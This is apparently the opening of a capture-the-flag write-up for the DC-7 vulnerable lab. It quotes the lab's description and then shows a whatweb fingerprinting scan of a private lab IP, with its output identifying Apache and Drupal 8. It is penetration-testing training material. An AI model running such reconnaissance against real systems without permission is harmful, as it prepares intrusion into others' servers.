DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will need to do, is to think "outside" of the box.
Waaaaaay "outside" of the box. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
┌──(root㉿kali)-[~] └─# whatweb -v http://172.18.1.143/ WhatWeb report for http://172.18.1.143/ Status : 200 OK Title : Welcome to DC-7 | D7 IP : 172.18.1.143 Country : RESERVED, ZZ
Detected Plugins: [ Apache ] The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.
Version : 2.4.25 (from HTTP Server Header) Google Dorks: (3) Website : http://httpd.apache.org/
[ Content-Language ] Detect the content-language setting from the HTTP header.
String : en
[ Drupal ] Drupal is an opensource CMS written in PHP.
Aggressive function available (check plugin file or details). Google Dorks: (1) Website : http://www.drupal.org
[ HTML5 ] HTML version 5, detected by the doctype declaration
[ HTTPServer ] HTTP server header string. This plugin also attempts to identify the operating system from the server header.
OS : Debian Linux String : Apache/2.4.25 (Debian) (from server string)
[ MetaGenerator ] This plugin identifies meta generator tags and extracts its value.
String : Drupal 8 (https://www.drupal.org)
[ PoweredBy ] This plugin identifies instances of 'Powered by x' text and attempts to extract the value for x.
String : -block
[ Script ] This plugin detects instances of script HTML elements and returns the script language/type.
[ UncommonHeaders ] Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com
[ X-Frame-Options ] This plugin retrieves the X-Frame-Options value from the HTTP header. - More Info: http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29. aspx
String : SAMEORIGIN
[ X-UA-Compatible ] This plugin retrieves the X-UA-Compatible value from the HTTP header and meta http-equiv tag. - More Info: http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers: HTTP/1.1 200 OK Date: Wed, 20 Dec 2023 20:23:49 GMT Server: Apache/2.4.25 (Debian) Cache-Control: must-revalidate, no-cache, private X-Drupal-Dynamic-Cache: MISS Link: <http://172.18.1.143/node/1>; rel="canonical" Link: <http://172.18.1.143/node/1>; rel="shortlink" Link: <http://172.18.1.143/node/1>; rel="revision" X-UA-Compatible: IE=edge Content-language: en X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Expires: Sun, 19 Nov 1978 05:00:00 GMT Vary: Accept-Encoding X-Generator: Drupal 8 (https://www.drupal.org) X-Drupal-Cache: HIT Content-Encoding: gzip Content-Length: 2653 Connection: close Content-Type: text/html; charset=UTF-8
